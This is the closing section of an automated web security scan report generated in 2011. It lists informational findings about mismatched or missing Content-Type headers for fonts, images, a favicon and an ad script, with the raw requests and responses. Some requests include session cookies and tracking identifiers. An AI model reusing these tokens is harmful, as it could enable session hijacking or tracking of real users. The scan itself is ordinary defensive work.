User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://getfirebug.com/styles/master.css

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:11:38 GMT
Expires: Thu, 23 Jun 2011 14:20:32 GMT
Cache-Control: max-age=1
Connection: Keep-Alive
Via: NS-CACHE-6.0: 4
Server: Apache
X-Backend-Server: pm-app-generic01
Accept-Ranges: bytes
ntCoent-Length: 26972
Content-Type: text/plain; charset=UTF-8
Content-Length: 26972

wOFF......i\................................FFTM..i@........Ubi.GDEF..f<....... ./..GPOS..h4.......T...eGSUB..f\.......^:JT.OS/2.......P...`.Ytlcmap............i..3gasp..f4............glyf......P7...8
...[SNIP]...

19.7. http://getfirebug.com/fonts/TitilliumMaps26L002.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://getfirebug.com
Path:	/fonts/TitilliumMaps26L002.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/TitilliumMaps26L002.woff HTTP/1.1
Host: getfirebug.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://getfirebug.com/styles/master.css

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:11:38 GMT
Expires: Thu, 23 Jun 2011 14:20:32 GMT
Cache-Control: max-age=1
Connection: Keep-Alive
Via: NS-CACHE-6.0: 4
Server: Apache
X-Backend-Server: pm-app-generic03
Accept-Ranges: bytes
ntCoent-Length: 27084
Content-Type: text/plain; charset=UTF-8
Content-Length: 27084

wOFF......i.................................FFTM..i.........Ubi.GDEF..f........ ./..GPOS..h........T...eGSUB..f........^:JT.OS/2.......P...`..tbcmap............i..3gasp..f.............glyf......P.....
...[SNIP]...

19.8. http://images.outbrain.com/imageserver/s/16837/aX4BWSJRgIsv4moXL4vKEgee-0-95x80.jpg&did=Dvf8N previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://images.outbrain.com
Path:	/imageserver/s/16837/aX4BWSJRgIsv4moXL4vKEgee-0-95x80.jpg&did=Dvf8N

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /imageserver/s/16837/aX4BWSJRgIsv4moXL4vKEgee-0-95x80.jpg&did=Dvf8N HTTP/1.1
Host: images.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=8212382c-a920-4555-8b81-259021933018; tick=1308836687756; _lvs2=gcr2RNPBQ0UcstLc+XEQOdZhPJBC9NIOcXKBpp2ugyL0NJmj4V4gRka8s2B63TgXlnhVznhqg580TWJgmSCK39PR1Z6o06ly; _lvd2=vn5eNmQLtMJ3WZvxM4ES5IqF+m3HPUaK; _rcc2=NXlRX9sMiunRtm+CPv1EhOsE3s6itk45; recs-1c8313e9a4b84112e634451b2329f2ce="GsEDBpgX72/0TM/+y0tWAIUSZ0JDzExsrPkqxc1AIXvUqn/WWsluCrkJz9UDQEdY"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: inline
Content-Type: image/png
Date: Thu, 23 Jun 2011 13:44:49 GMT
Accept-Ranges: bytes
Cache-Control: private, max-age=30
Age: 0
Expires: Thu, 23 Jun 2011 13:45:19 GMT
x-cdn: Served by Cotendo
Connection: Keep-Alive
Content-Length: 1140

......JFIF.............C.......................
. ....................!........."$".$.......C.......................................................................P._.."..............................
...[SNIP]...

19.9. http://license.icopyright.net/rights/images/favicon.ico previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://license.icopyright.net
Path:	/rights/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /rights/images/favicon.ico HTTP/1.1
Host: license.icopyright.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A9CDA4EB3FDC025F39C802E4AD94520C; __utmz=37128509.1308838673.1.1.utmcsr=sqlmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/sql-server/hardening%20sql%20server-135858; __utma=37128509.1704898354.1308838673.1308838673.1308838673.1; __utmc=37128509; __utmb=37128509.1.10.1308838673

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:17:54 GMT
Server: Apache
Last-Modified: Thu, 26 May 2011 03:12:39 GMT
ETag: "2a891c4-37e-4a425318e57c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ........................................................................................000......................................................000wwweee............www
...[SNIP]...

20. Content type is not specified previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.z5x.net
Path:	/st

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /st?ad_type=ad&ad_size=728x90&section=762900 HTTP/1.1
Host: ad.z5x.net
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 23 Jun 2011 13:44:37 GMT
Pragma: no-cache
Content-Length: 4283
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...

Report generated by XSS.CX at Thu Jun 23 09:45:13 CDT 2011.